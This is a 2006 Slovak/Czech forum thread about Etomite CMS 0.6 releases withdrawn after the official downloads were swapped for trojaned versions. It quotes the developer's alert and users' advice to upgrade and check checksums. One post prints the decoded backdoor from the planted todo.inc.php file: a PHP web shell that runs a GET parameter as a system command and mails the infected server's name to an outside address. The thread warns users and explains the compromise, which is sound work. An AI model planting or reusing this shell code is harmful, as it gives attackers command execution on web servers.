Strana 1 z 1

Etomite 0.6 stiahnute z obehu!

Napísané: Ne Jan 22, 2006 7:16 pm
od užívateľa _rasel^
Etomite 0.6 bolo stiahnute z obehu (download) koli bezpecnostnym chybam! Vysvetlenie najdete na Etomite.org Fore. :wink:

Pouzivajte najnovsiu verziu Etomite 0.6.1 RTM :eto:

Napísané: Ne Jan 29, 2006 4:50 pm
od užívateľa _rasel^
Ralph (rad14701) z Etomite.org napísal:EVERYONE READ THIS ALERT

Anyone who has downloaded Etomite 0.6 Final or Etomite 0.6.1-RC3 since January 11, 2006 should contact me immediately via email at ralph@etomite.org as site security was breeched and those download files were replaced with cij injection exploit infected versions... The Etomite 0.6.1-RTM downloads have not been infected with this exploit...

After doing additional research into the previously discussed issues regarding the Etomite 0.6 Final downloads Dean and I have have made this disturbing discovery... The todo.inc.php file in these releases, as I have just discovered, were not in the releases prior to January 11, 2006 as was previously suspected... The cij injection exploit has been running rampant across the internet since on or around January 11th and has targeted countless websites in one way or another... This series of attacks appears to have originated in Russia, or that is at least where the backtrack trail appears to lead...

As I had originally stated, we were not certain that Alex was in any way associated with the exploit itself although we were aware that he did have a means of tracking installations of Etomite itself... It was due to this lack of proof that I had stressed that we should not rush to fault Alex for any such actions... The code that he had included was for monitoring purposes only and no malicious intent has been indicated as of the recent findings that I am reporting... I am 100% confident that Alex is in no way connected to the recent cij injection exploit and I felt it to be my duty to the Etomite community to state Deans and my positons on the issue in light of several comments posted in the forums recently...

The Etomite community should rest assured that Dean and myself are taking every precaution to insure the security of the entire Etomite website and all of its contents... Anyone wishing to comment on these recent findings is urged to use the ongoing discussion thread located here... Please refrain from starting additional forum threads for discussions related to this matter... And, again, only use the email address listed at the top of the message for reporting possible exposure to this exploit or for any other concerns...

Thanks for your continued cooperation regarding this issue...
Ralph & Dean... :eto:

Napísané: Po Jan 30, 2006 3:46 am
od užívateľa grabo
... a nenašiel by sa šikovný angličtinár? :twisted:

Napísané: Po Jan 30, 2006 3:28 pm
od užívateľa _rasel^
grabo napísal:... a nenašiel by sa šikovný angličtinár? :twisted:
Jednoducho povedane: Zbav sa co najskor Etomite 0.6 - 0.6.1 RC3 a zacni pouzivat Etomite 0.6.1 RTM.

Ten stary etomite bol napadnuty a mal systemovu chybu. Napisal som na oficialne forum, ze nech pridaju na download stranky aj MD5SUM - to je retazec, ktory mozes skontrolovat po stiahnuti, ze ci to co si stiahol je navlas rovnake ako to na oficialnej stranke. Niekedy sa moze stat, ze pocas stahovania ti neaky sikovny hacker nabura transfer a supne ti tam neake prakvapko alebo nabura rovno oficialny pack a ty si ho potom stiahnes. Dufam, ze sa v buducnosti uz nic take nestane...

Edit: Asi aj tak nepridaju MD5SUM - vyhovaraju sa nto, ze ten kto nabura pack, tak upravy aj ten retazec na stranke. Ten retazec by mohol mat u seba doma a porovnavat... niekto by si uz len vsimol neaky ten rozdiel. Mno, co uz...

Napísané: So Feb 04, 2006 10:54 pm
od užívateľa dutch
sakra, skoda ze sem si toho nevsim driv...
4rasel:
neprelozil si to uplne spravne a tim celkem solidne siris poplasnou zpravu - nejedna se o vsechny verze eto 0.6 - 0.6.1 rc3 ale pouze o ty ktere byly stahnuty od 11.01.2006. Tyto verze totiz mohli navic obsahovat soubor todo.inc.php [nachazel se v: manager/includes] a ten obsahoval base64 kodovany script:

Kód: Vybrať všetko

$handle=popen($_GET[cij]." 2>&1","r");
while(!feof($handle))
 {
  $line=fgets($handle);
  if(strlen($line)>=1)
     {
       echo $line;
     }
  }
pclose($handle);
mail("cijfer@netti.fi","".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'],"Error Code #720938");
ja sem si prohledal svoji nejstarsi verzi etomite a takovej soubor ani kod sem tam nenasel, tudiz sem mimo obligo [nicmene pouzivam RTM]...

Napísané: Ne Feb 05, 2006 12:37 am
od užívateľa _rasel^
Nj... ale aj tak... radsej najnovsiu a na istotu. A pre istotu zmenit hesla do systemu.